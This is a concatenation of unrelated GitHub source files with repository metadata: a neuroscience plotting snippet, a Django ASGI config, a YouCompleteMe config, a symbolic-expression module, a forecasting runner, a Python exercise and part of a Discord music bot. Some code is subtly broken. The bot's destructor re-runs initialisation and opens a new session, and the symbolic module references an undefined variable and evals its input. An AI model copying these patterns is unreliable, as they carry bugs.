Diccionario=Cargar(Nombre_Carga) #Cargo el diccionario generado anteriormente
"""CONCATENO LOS INTERVALOS EN LOS QUE SE UTILIZO LA MISMA LUZ l2 O l4"""
Disparos_clu=np.array([])
for i in range(30):
#if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero 6"]["Luz"]["l2.{}".format(i)]))
"""PROCESO LOS DATOS PARA LA MISMA LUZ l2 O l4"""
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) #Determino los disparos
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001)
Time=Tiempo_2(Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 1)
plt.imshow(Imagen_Filtrada,cmap="jet")
plt.imshow(Tasa_de_disparo,cmap="jet")
#plt.imshow(Tasa_de_disparo,cmap="jet",vmin=0,vmax=1)
#plt.imshow(Imagen_Filtrada,cmap="jet",vmin=0,vmax=1)
|
[
"noreply@github.com"
] |
tomasgarcianeuro.noreply@github.com
|
c32fdb4787b51913dcb94e2128d2912fad182b06
|
3b871bdc672632e72bbdb72f98c914db660829b4
|
/Django_Project/Django_Project/asgi.py
|
5eb588cf3ef16a21bf99a45c2a9698189ff79917
|
[] |
no_license
|
JasbirCodeSpace/Django-Blog-Web-App
|
b1a58730a17c204fe4c8ad8ab4f3f1d47d5b30e1
|
6af67d03bbec997b972feacb2873efaa542becaa
|
refs/heads/master
| 2022-08-25T23:12:05.591494
| 2020-05-20T07:19:48
| 2020-05-20T07:19:48
| 264,860,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
ASGI config for Blog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings before building the application object.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Django_Project.settings')
# Module-level ASGI callable that ASGI servers (daphne, uvicorn, ...) import.
application = get_asgi_application()
|
[
"shikhawat.jasbir@gmail.com"
] |
shikhawat.jasbir@gmail.com
|
c292ededc8a2ccc3333ba607b656b58dd2f5efe0
|
3def38a9c4e148fbec899d8e6115cdefb61ceead
|
/.ycm_extra_conf.py
|
6cbf0f0a59f53d4b04046f1885363df2db3fdae4
|
[] |
no_license
|
shinew/configs
|
a2a7e8eca6dc25c5f5d097d6e4d11d43f3c2adff
|
d910c8935c0d302dd80e116c1740b32e22e1b7ce
|
refs/heads/master
| 2021-03-27T15:50:50.334607
| 2018-03-31T00:19:30
| 2018-03-31T00:19:30
| 55,921,635
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
#'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++14',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# Here are the system includes, found by: 'echo | clang -v -E -x c++ -'
'-isystem',
'/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1',
'-isystem',
'/usr/local/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/lib/clang/9.1.0/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/include',
'-isystem',
'/usr/include',
#'-isystem',
#'/usr/local/lib',
# '-isystem',
# os.path.join(os.environ['GTEST_DIR'], 'include'),
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
  """Return the absolute path of the directory containing this config file."""
  script_path = os.path.abspath( __file__ )
  return os.path.dirname( script_path )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
  """Return a copy of *flags* where relative include/sysroot paths are
  rooted at *working_directory*.

  Handles both the split form ("-I", "path") and the fused form ("-Ipath").
  With a falsy working directory the flags are returned unchanged (copied).
  Empty flags are dropped, matching the original behaviour.
  """
  if not working_directory:
    return list( flags )
  path_options = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
  absolute_flags = []
  expecting_path = False   # previous flag was a bare path option like "-I"
  for flag in flags:
    rewritten = flag
    if expecting_path:
      expecting_path = False
      if not flag.startswith( '/' ):
        rewritten = os.path.join( working_directory, flag )
    for option in path_options:
      if flag == option:
        expecting_path = True
        break
      if flag.startswith( option ):
        tail = flag[ len( option ): ]
        rewritten = option + os.path.join( working_directory, tail )
        break
    if rewritten:
      absolute_flags.append( rewritten )
  return absolute_flags
def IsHeaderFile( filename ):
  """True when *filename* carries a C/C++ header extension."""
  return os.path.splitext( filename )[ 1 ] in ( '.h', '.hxx', '.hpp', '.hh' )
def GetCompilationInfoForFile( filename ):
  """Look up compile flags for *filename* in the compilation database.

  Assumes the module-level `database` is non-None (the only caller,
  FlagsForFile, checks this first).  Returns None when *filename* is a
  header with no sibling source file that has flags.
  """
  # The compilation_commands.json file generated by CMake does not have entries
  # for header files. So we do our best by asking the db for flags for a
  # corresponding source file, if any. If one exists, the flags for that file
  # should be good enough.
  if IsHeaderFile( filename ):
    basename = os.path.splitext( filename )[ 0 ]
    for extension in SOURCE_EXTENSIONS:
      replacement_file = basename + extension
      if os.path.exists( replacement_file ):
        compilation_info = database.GetCompilationInfoForFile(
          replacement_file )
        if compilation_info.compiler_flags_:
          return compilation_info
    return None
  return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
  """YCM entry point: return the compile flags to use for *filename*.

  With a compilation database, flags come from the database entry (made
  absolute against its working directory); otherwise the hand-written
  module-level `flags` list is used, rooted at this script's directory.
  Returns None when the database has no usable entry for the file.
  """
  if database:
    # Bear in mind that compilation_info.compiler_flags_ does NOT return a
    # python list, but a "list-like" StringVec object
    compilation_info = GetCompilationInfoForFile( filename )
    if not compilation_info:
      return None
    final_flags = MakeRelativePathsInFlagsAbsolute(
      compilation_info.compiler_flags_,
      compilation_info.compiler_working_dir_ )
  else:
    relative_to = DirectoryOfThisScript()
    final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
  return {
    'flags': final_flags,
    'do_cache': True
  }
|
[
"shine.sw.wang@gmail.com"
] |
shine.sw.wang@gmail.com
|
44a6e5f1f5fda5f40b242e469cc4314b106c8306
|
e6b969b7c50de5ae61c4b76ec31a982d16523e46
|
/sym.py
|
3f88fe9fcc929640105de765ca5654c69c9dd65f
|
[] |
no_license
|
dlovemore/parle
|
7d52dc76716f3f8a5f085aa26277b2c52b98b098
|
e949c743b2760079eb3c3eb67198e69562521d20
|
refs/heads/master
| 2021-01-03T07:04:09.060552
| 2020-10-20T13:01:59
| 2020-10-20T13:01:59
| 239,972,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
class Base:
    """Minimal value object whose whole state is a positional-argument tuple.

    Subclasses (expression nodes) store everything in ``args``; ``__repr__``
    prints a constructor-style form such as ``Base(1, 2)``.
    """
    def __init__(self, *args):
        self._args = args

    @property
    def args(self):
        return self._args

    @args.setter
    def args(self, value):
        self._args = value

    def __repr__(self):
        # repr of the list, minus its brackets, gives "a, b, c".
        inner = repr(list(self.args))[1:-1]
        return f'{type(self).__name__}({inner})'
class E(Base):
    """Symbolic expression node: args = (operator, operand, operand, ...).

    Every overloaded operator builds a new E node instead of computing a
    value, so ordinary Python expressions over E instances construct an AST.
    Note: because __eq__ is overloaded to build a node (not return a bool),
    Python implicitly sets __hash__ to None — E instances are unhashable.
    """
    # --- accessors over the args tuple -----------------------------------
    @property
    def op(self):
        # The operator tag is always args[0].
        return self.args[0]
    @property
    def exprs(self):
        # All operands, without the operator tag.
        return self.args[1:]
    @property
    def lhs(self):
        return self.args[1]
    @property
    def rhs(self):
        return self.args[2]
    @property
    def a1(self):
        return self.args[1]
    @property
    def a2(self):
        return self.args[2]
    # --- binary/unary operators: each builds a tagged node ---------------
    def __add__(self, rhs):
        return E('+',self,rhs)
    def __contains__(self, lhs):
        # `x in e` builds an ' in ' node (operand order: lhs first).
        return E(' in ',lhs,self)
    def __truediv__(self, rhs):
        return E('/',self,rhs)
    def __floordiv__(self, rhs):
        return E('//',self,rhs)
    def __and__(self, rhs):
        return E('&',self,rhs)
    def __xor__(self, rhs):
        return E('^',self,rhs)
    def __invert__(self):
        # Unary operators use a '_' suffix/prefix convention in the tag.
        return E('~_',self)
    def __or__(self, rhs):
        return E('|',self,rhs)
    def __pow__(self, rhs):
        return E('**',self,rhs)
    def __getitem__(self, k):
        return E('[]',self, k)
    def __lshift__(self, rhs):
        return E('<<',self, rhs)
    def __mod__(self, rhs):
        return E('%',self, rhs)
    def __mul__(self, rhs):
        return E('*',self, rhs)
    def __matmul__(self, rhs):
        return E('@',self, rhs)
    def __neg__(self):
        return E('-_',self)
    def __pos__(self):
        return E('+_',self)
    def __rshift__(self, rhs):
        return E('>>',self, rhs)
    def __sub__(self, rhs):
        return E('-',self, rhs)
    # Comparisons also build nodes — they do NOT return booleans.
    def __lt__(self, rhs):
        return E('<',self, rhs)
    def __le__(self, rhs):
        return E('<=',self, rhs)
    def __eq__(self, rhs):
        return E('==',self, rhs)
    def __ne__(self, rhs):
        return E('!=',self, rhs)
    def __ge__(self, rhs):
        return E('>=',self, rhs)
    def __gt__(self, rhs):
        return E('>',self, rhs)
    def __call__(self, *args):
        # e(a, b) builds a call node tagged '_()'.
        return E('_()',self, *args)
def dolet(k, v):
    """Build an assignment node ``k = v``."""
    return E('=', k, v)
class LetClause(Base):
    """Intermediate produced by ``let(...)``: subscripting with the bound
    body yields the final '=' node (tuples fold into a ',' node first)."""
    def __getitem__(self, k):
        body = E(',', *k) if isinstance(k, tuple) else k
        return E('=', E('args', *self.args), body)
class Let:
    """Factory for let-bindings: ``let(x)[expr]`` builds an '=' node."""
    def __setitem__(self,k,v):
        # NOTE(review): `stmts` is not defined in any enclosing scope, so
        # `let[k] = v` always raises NameError — looks like unfinished code;
        # confirm the intended statement accumulator before relying on it.
        stmts += dolet(k,v)
    def __call__(self,*args):
        return LetClause(*args)
let=Let()
class Stmt:
    """Statement builder: ``Stmt(op)[expr]`` produces ``E(op, expr)``,
    folding a tuple subscript into a ',' node first."""
    def __init__(self,k):
        # Operator tag this statement wraps.
        self.op = k
    def __getitem__(self, k):
        body = E(',', *k) if isinstance(k, tuple) else k
        return E(self.op, body)
# Use like:
# let(x)[x+1]
# or [let(x)[4], let(Y)[X+1]]
class Env:
    """Namespace that lazily creates ``E(op, name)`` variable nodes.

    Each new name is cached and also published into the *globals* mapping,
    so afterwards the bare identifier resolves at module level too.
    """
    def __init__(self, globals, op='var'):
        self.globals = globals
        self.vars = dict()   # name -> node cache
        self.op = op

    def __call__(self, name):
        try:
            return self.vars[name]
        except KeyError:
            node = E(self.op, name)
            self.globals[name] = node
            self.vars[name] = node
            return node

    def __getattr__(self, name):
        # var.X is sugar for var('X'); only missing attributes land here.
        return self(name)
var=Env(globals())
v=var
arg=var
class OnClause:
    """Carries a condition; subscripting attaches the branch(es):
    ``on(c)[x]`` -> '?' node, ``on(c)[x:y]`` -> ternary '?:' node."""
    def __init__(self, e):
        self.e = e

    def __getitem__(self, branch):
        if not isinstance(branch, slice):
            return E('?', self.e, branch)
        assert branch.step is None   # a step has no meaning here
        return E('?:', self.e, branch.start, branch.stop)
class On:
    """Entry point: ``on(cond)`` yields an OnClause awaiting its branches."""
    def __call__(self, e):
        return OnClause(e)
on=On()
IF=on
class LambdaClause:
    """Holds lambda parameters; subscripting with the body builds a 'λ' node."""
    def __init__(self, *args):
        self.args = args

    def __getitem__(self, rhs):
        return E('λ', self.args, rhs)
class LambdaDefiner:
    """``λ(params)[body]`` entry point.

    NOTE(review): *args* is passed to LambdaClause as one tuple, so the
    parameters end up double-wrapped (visible in the doctest output further
    down, `E('λ', ((...),), ...)`); appears intentional — confirm.
    """
    def __call__(self, *args):
        return LambdaClause(args)
λ=LambdaDefiner()
class Ref:
    """Placeholder for a shared node, identified by *uid* within a RefMaker.

    ``ref @ value`` binds *value* as the referee exactly once; a second
    binding raises RuntimeError.  repr() mirrors the ``<uid>@R`` source form.
    """
    def __init__(self, r, uid):
        self.refmaker = r
        self.uid = uid

    def __matmul__(self, rhs):
        if self in self.refmaker.rees:
            raise RuntimeError   # each uid may be bound only once
        self.refmaker.rees[self] = rhs
        return rhs

    def __repr__(self):
        return f'{self.uid}@R'
class RefMaker:
    """Registry of shared-node placeholders used by save()/load().

    ``uid @ refmaker`` (handled via __rmatmul__, since int has no __matmul__
    for this type) returns the unique Ref object for that uid.
    """
    def __init__(self):
        self.refs = dict()   # uid -> Ref placeholder
        self.rees = dict()   # Ref -> bound referee object

    def __rmatmul__(self, uid):
        """Handle ``uid @ self``: fetch or create the Ref for *uid*."""
        ref = self.refs.get(uid)
        if ref is None:
            ref = Ref(self, uid)
            self.refs[uid] = ref
        return ref
def save(x):
    """Serialize an expression tree to evaluatable source text.

    Nodes reached more than once (shared subtrees, detected by id()) are
    emitted once with a ``<uid>@R@`` prefix and referenced afterwards as
    ``<uid>@R``, so load() can rebuild the sharing.  Non-Base leaves are
    emitted with repr(), so they must round-trip through eval.
    """
    seen=set()
    many=set()
    # First pass: mark every object id reached twice as shared.
    def mr(x):
        if id(x) in seen:
            many.add(id(x))
        else:
            seen.add(id(x))
            if isinstance(x, Base):
                for a in x.args:
                    mr(a)
    mr(x)
    uids=dict() # object id -> assigned uid for shared nodes
    uid=1
    # Second pass: print, tagging shared nodes on first emission and
    # replacing later occurrences with a uid reference.
    def pr(x):
        nonlocal uid
        s=''
        if id(x) in many:
            if id(x) in uids:
                return f'{uids[id(x)]}@R'
            else:
                uids[id(x)]=uid
                s+=f'{uid}@R@'
                uid+=1
        if isinstance(x, Base):
            first=True
            s+=f'{type(x).__name__}('
            for arg in x.args:
                if first: first=False
                else: s+=','
                s+=pr(arg)
            s+=')'
        else:
            s+=repr(x)
        return s
    return pr(x)
def load(s):
    """Rebuild an expression tree from text produced by save().

    SECURITY: this eval()s *s* — never call it on untrusted input.
    A fresh global RefMaker ``R`` collects the ``<uid>@R`` placeholders
    during eval; the resolve pass then swaps every Ref for its bound
    referee, restoring the original sharing.
    """
    global R
    R=RefMaker()
    b=eval(s)
    seen=set()
    # Walk each node once (guarded by id()) and replace Refs in-place.
    def resolve(x):
        if id(x) not in seen:
            seen.add(id(x))
            if isinstance(x, Base):
                x.args=[resolve(a) for a in x.args]
        if isinstance(x, Ref):
            return R.rees[x]
        else:
            return x
    resolve(b)
    return b
# >>> from sym import *
# >>> X=var.X
# >>> print(v.Y)
# E('var', 'Y')
# >>> a=[1,2]
# >>> a[0]=3
# >>> a[0]+=3
# >>> E('a','var')[3]
# E('[]', E('a', 'var'), 3)
# >>> a=v.a
# >>> a[0]
# E('[]', E('var', 'a'), 0)
# >>> v.X<v.Y
# E('<', E('var', 'X'), E('var', 'Y'))
# >>> v.X[v.X+1,]
# E('[]', E('var', 'X'), (E('+', E('var', 'X'), 1),))
# >>>
# >>> globals()['ai']=12
# >>> ai
# 12
# >>>
# >>> on(X)[3:4]
# E('?:', E('var', 'X'), 3, 4)
# >>> on(X)[3]
# E('?', E('var', 'X'), 3)
# >>> E(E('X','var'),'?',3)
# E(E('X', 'var'), '?', 3)
# >>> var.A
# E('var', 'A')
# >>> A
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# NameError: name 'A' is not defined
# >>> var=Env(globals())
# >>> var.A
# E('var', 'A')
# >>> A
# E('var', 'A')
# >>> E
# <class 'sym.E'>
# >>>
# >>> [getattr(var,x) for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']
# [E('var', 'A'), E('var', 'B'), E('var', 'C'), E('var', 'D'), E('var', 'E'), E('var', 'F'), E('var', 'G'), E('var', 'H'), E('var', 'I'), E('var', 'J'), E('var', 'K'), E('var', 'L'), E('var', 'M'), E('var', 'N'), E('var', 'O'), E('var', 'P'), E('var', 'Q'), E('var', 'R'), E('var', 'S'), E('var', 'T'), E('var', 'U'), E('var', 'V'), E('var', 'W'), E('var', 'X'), E('var', 'Y'), E('var', 'Z')]
# >>> A
# E('var', 'A')
# >>> E
# E('var', 'E')
# >>> import fun
# >>> fun.E
# <class 'parle.sym.E'>
# >>> var.E
# E('var', 'E')
# >>> fun.E
# <class 'parle.sym.E'>
# >>> λ(X)[X+1]
# E('λ', ((E('var', 'X'),),), E('+', E('var', 'X'), 1))
# >>>
# >>>
# >>> let(X)
# LetClause(E('var', 'X'))
# >>> let(X)[X+1]
# E('=', E('args', E('var', 'X')), E('+', E('var', 'X'), 1))
# >>> LET=Stmt('let')
# >>>
# >>> LET(X)
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# TypeError: 'Stmt' object is not callable
# >>> LET[X]
# E('let', E('var', 'X'))
# >>>
|
[
"davidlovemore@gmail.com"
] |
davidlovemore@gmail.com
|
9b51264685632fddec2373e3a341f25d8d1d3fc9
|
e00fe1e065b448f6f8c0472ed2b8a39991fa7b1b
|
/Fuzzy_clustering/version2/template/project_run.py
|
4188a8c1f9dfdd2d18eda05f8e884d4dcc2f62af
|
[
"Apache-2.0"
] |
permissive
|
joesider9/forecasting_library
|
1a4ded5b09fc603f91fa1c075e79fc2ed06c08a8
|
db07ff8f0f2693983058d49004f2fc6f8849d197
|
refs/heads/master
| 2023-03-29T12:18:22.261488
| 2021-04-01T08:57:08
| 2021-04-01T08:57:08
| 319,906,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,106
|
py
|
from Fuzzy_clustering.version2.project_managers.project_eval_manager import ProjectsEvalManager
from Fuzzy_clustering.version2.project_managers.projects_data_manager import ProjectsDataManager
from Fuzzy_clustering.version2.project_managers.projects_train_manager import ProjectsTrainManager
from Fuzzy_clustering.version2.template.constants import *
from Fuzzy_clustering.version2.template.util_database_timos import write_database
def prepare_data():
    """Run NWP extraction and dataset creation for the training split (and
    for the evaluation split when present), then link related projects."""
    static_data = write_database()
    data_manager = ProjectsDataManager(static_data, is_test=False)

    # Training split: extract numerical-weather-prediction data, then datasets.
    if data_manager.nwp_extractor() != DONE:
        raise RuntimeError('Something was going wrong with nwp extractor')
    if data_manager.create_datasets() != DONE:
        raise RuntimeError('Something was going wrong with data manager')
    data_manager.create_projects_relations()

    # Second pass over the held-out evaluation data, when configured.
    if hasattr(data_manager, 'data_eval'):
        data_manager.is_test = True
        if data_manager.nwp_extractor() != DONE:
            raise RuntimeError('Something was going wrong with nwp extractor on evaluation')
        if data_manager.create_datasets() != DONE:
            raise RuntimeError('Something was going wrong with on evaluation dataset creator')
    print("Data is prepared, training can start")
def train_project():
    """Fit all configured projects using the shared static configuration."""
    manager = ProjectsTrainManager(write_database())
    manager.fit()
def eval_project():
    """Evaluate all configured projects on the held-out data."""
    manager = ProjectsEvalManager(write_database())
    manager.evaluate()
def backup_project():
    """Clear stale project backups via the train manager's housekeeping."""
    manager = ProjectsTrainManager(write_database())
    manager.clear_backup_projects()
# Full pipeline: data preparation -> training -> evaluation -> backup cleanup.
if __name__ == '__main__':
    prepare_data()
    train_project()
    eval_project()
    backup_project()
|
[
"joesider9@gmail.com"
] |
joesider9@gmail.com
|
7aa9a5b9b241ba9dc321a5f3fd7bbbd8dc028125
|
4a2b457f13628ebbf3cd379202b5354fa73bf1e5
|
/Python_3/Modulo 3/4 - Funções em Python/Exercício_100_Funções_para_sortear_e_somar.py
|
37bfc675f73b9a65e8824473012ac0d3d6939c9c
|
[
"MIT"
] |
permissive
|
Jose0Cicero1Ribeiro0Junior/Curso_em_Videos
|
abb2264c654312e6b823a3a9d4b68e0c999ada3f
|
b0bb4922ea40ff0146b5a7e205fe2f15cd9a297b
|
refs/heads/master
| 2022-12-19T19:18:53.234581
| 2020-10-23T12:29:09
| 2020-10-23T12:29:09
| 288,749,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
#Exercício Python 100: Faça um programa que tenha uma lista chamada números e duas funções chamadas sorteia() e somaPar(). A primeira função vai sortear 5 números e vai colocá-los dentro da lista e a segunda função vai mostrar a soma entre todos os valores pares sorteados pela função anterior.
from random import randint
from time import sleep
def sorteia(lista):
    """Append five random integers in [1, 10] to *lista*, echoing each draw
    with a short pause for dramatic effect."""
    print('Soreteando 5 valores da lista: ', end='')
    for _ in range(5):
        sorteado = randint(1, 10)
        lista.append(sorteado)
        print(f'{sorteado} ', end='', flush=True)
        sleep(0.3)
    print('PRONTO!')
def somaPar(lista):
    """Print the sum of the even values in *lista* (returns None)."""
    soma = sum(valor for valor in lista if valor % 2 == 0)
    print(f'Somando os valores pares de {lista}, temos {soma}')
# Build the shared list, fill it with five random draws, then report the
# sum of the even draws.
números = list()
sorteia(números)
somaPar(números)
|
[
"Jose0Cicero1Ribeiro0Junior@outlook.com"
] |
Jose0Cicero1Ribeiro0Junior@outlook.com
|
9c4146cf8d2c46ce68c4b555792e4dfbf0abee79
|
bb0fc24a46415c6780f734e4d7a6d9a8b203b02b
|
/musicbot/bot.py
|
49fe612d7542a775817784cf3f3f7dee10b9d6a2
|
[
"MIT"
] |
permissive
|
EZIO1337/papiezbotv6
|
b1880a1f4401737038c97499036e803def801496
|
dd93f8ca2d43a76517170bd4ea192524d66fb337
|
refs/heads/master
| 2021-05-16T14:41:37.671601
| 2018-01-22T23:25:26
| 2018-01-22T23:25:26
| 118,528,619
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108,261
|
py
|
import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from discord.ext.commands.bot import _get_variable
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .constructs import SkipState, Response, VoiceStateUpdate
from .utils import load_file, write_file, fixg, ftimedelta, _func_
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()
log = logging.getLogger(__name__)
class MusicBot(discord.Client):
    def __init__(self, config_file=None, perms_file=None):
        """Load configuration, permissions, blacklist and autoplaylist,
        set up logging, and initialize the underlying discord.Client.

        Parameters default to the standard config/permissions file paths.
        """
        try:
            # Set the terminal window title; ignored where unsupported.
            sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
        except:
            pass
        if config_file is None:
            config_file = ConfigDefaults.options_file
        if perms_file is None:
            perms_file = PermissionsDefaults.perms_file
        # Runtime state.
        self.players = {}                # server -> MusicPlayer
        self.exit_signal = None
        self.init_ok = False
        self.cached_app_info = None
        self.last_status = None
        self.config = Config(config_file)
        # The owner is implicitly granted every permission.
        self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
        self.blacklist = set(load_file(self.config.blacklist_file))
        self.autoplaylist = load_file(self.config.auto_playlist_file)
        # Working copy consumed during a session so entries aren't repeated.
        self.autoplaylist_session = self.autoplaylist[:]
        self.aiolocks = defaultdict(asyncio.Lock)
        self.downloader = downloader.Downloader(download_folder='audio_cache')
        self._setup_logging()
        log.info(' MusicBot (version {}) '.format(BOTVERSION).center(50, '='))
        if not self.autoplaylist:
            log.warning("Autoplaylist is empty, disabling.")
            self.config.auto_playlist = False
        else:
            log.info("Loaded autoplaylist with {} entries".format(len(self.autoplaylist)))
        if self.blacklist:
            log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))
        # TODO: Do these properly
        # Per-server mutable state, created on first access with these defaults.
        ssd_defaults = {
            'last_np_msg': None,
            'auto_paused': False,
            'availability_paused': False
        }
        self.server_specific_data = defaultdict(ssd_defaults.copy)
        super().__init__()
        # HTTP session shares the client's event loop; tag our user agent.
        self.aiosession = aiohttp.ClientSession(loop=self.loop)
        self.http.user_agent += ' MusicBot/%s' % BOTVERSION
def __del__(self):
# These functions return futures but it doesn't matter
try: self.http.session.close()
except: pass
try: self.aiosession.close()
except: pass
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
# TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable('message')
if not orig_msg or orig_msg.author.id == self.config.owner_id:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)
return wrapper
def dev_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
orig_msg = _get_variable('message')
if orig_msg.author.id in self.config.dev_ids:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only dev users can use this command", expire_in=30)
wrapper.dev_cmd = True
return wrapper
    def ensure_appinfo(func):
        """Decorator: refresh the cached application info before running the
        wrapped coroutine."""
        @wraps(func)
        async def wrapper(self, *args, **kwargs):
            await self._cache_app_info()
            # noinspection PyCallingNonCallable
            return await func(self, *args, **kwargs)
        return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice_channel if voice else True),
server.members if server else self.get_all_members()
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
    def _setup_logging(self):
        """Install the package's colorized stdout handler (idempotent) and,
        in debug mode, a file handler for the discord library's own logger."""
        # Guard against double-installation on reconnect/reload.
        if len(logging.getLogger(__package__).handlers) > 1:
            log.debug("Skipping logger setup, already set up")
            return
        shandler = logging.StreamHandler(stream=sys.stdout)
        # Per-level formats and colors, including the package's custom levels
        # (EVERYTHING/NOISY/VOICEDEBUG/FFMPEG).
        shandler.setFormatter(colorlog.LevelFormatter(
            fmt = {
                'DEBUG': '{log_color}[{levelname}:{module}] {message}',
                'INFO': '{log_color}{message}',
                'WARNING': '{log_color}{levelname}: {message}',
                'ERROR': '{log_color}[{levelname}:{module}] {message}',
                'CRITICAL': '{log_color}[{levelname}:{module}] {message}',
                'EVERYTHING': '{log_color}[{levelname}:{module}] {message}',
                'NOISY': '{log_color}[{levelname}:{module}] {message}',
                'VOICEDEBUG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}',
                'FFMPEG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}'
            },
            log_colors = {
                'DEBUG': 'cyan',
                'INFO': 'white',
                'WARNING': 'yellow',
                'ERROR': 'red',
                'CRITICAL': 'bold_red',
                'EVERYTHING': 'white',
                'NOISY': 'white',
                'FFMPEG': 'bold_purple',
                'VOICEDEBUG': 'purple',
            },
            style = '{',
            datefmt = ''
        ))
        shandler.setLevel(self.config.debug_level)
        logging.getLogger(__package__).addHandler(shandler)
        log.debug("Set logging level to {}".format(self.config.debug_level_str))
        if self.config.debug_mode:
            # Mirror the discord library's DEBUG output into logs/discord.log.
            dlogger = logging.getLogger('discord')
            dlogger.setLevel(logging.DEBUG)
            dhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='w')
            dhandler.setFormatter(logging.Formatter('{asctime}:{levelname}:{name}: {message}', style='{'))
            dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(vchannel: discord.Channel, *, excluding_me=True, excluding_deaf=False):
def check(member):
if excluding_me and member == vchannel.server.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
return True
return not sum(1 for m in vchannel.voice_members if check(m))
    async def _join_startup_channels(self, channels, *, autosummon=True):
        """Join the configured startup voice channels.

        Channel choice per server, in increasing priority: configured autojoin
        channel, a channel we can resume in, then (with autosummon) the channel
        the owner is currently sitting in.
        """
        joined_servers = set()
        channel_map = {c.server: c for c in channels}

        def _autopause(player):
            # Pause immediately if the bot joined an empty channel.
            if self._check_if_empty(player.voice_client.channel):
                log.info("Initial autopause in empty channel")
                player.pause()
                self.server_specific_data[player.voice_client.channel.server]['auto_paused'] = True

        for server in self.servers:
            if server.unavailable or server in channel_map:
                continue
            # Prefer a channel we are already connected to (session resume).
            if server.me.voice_channel:
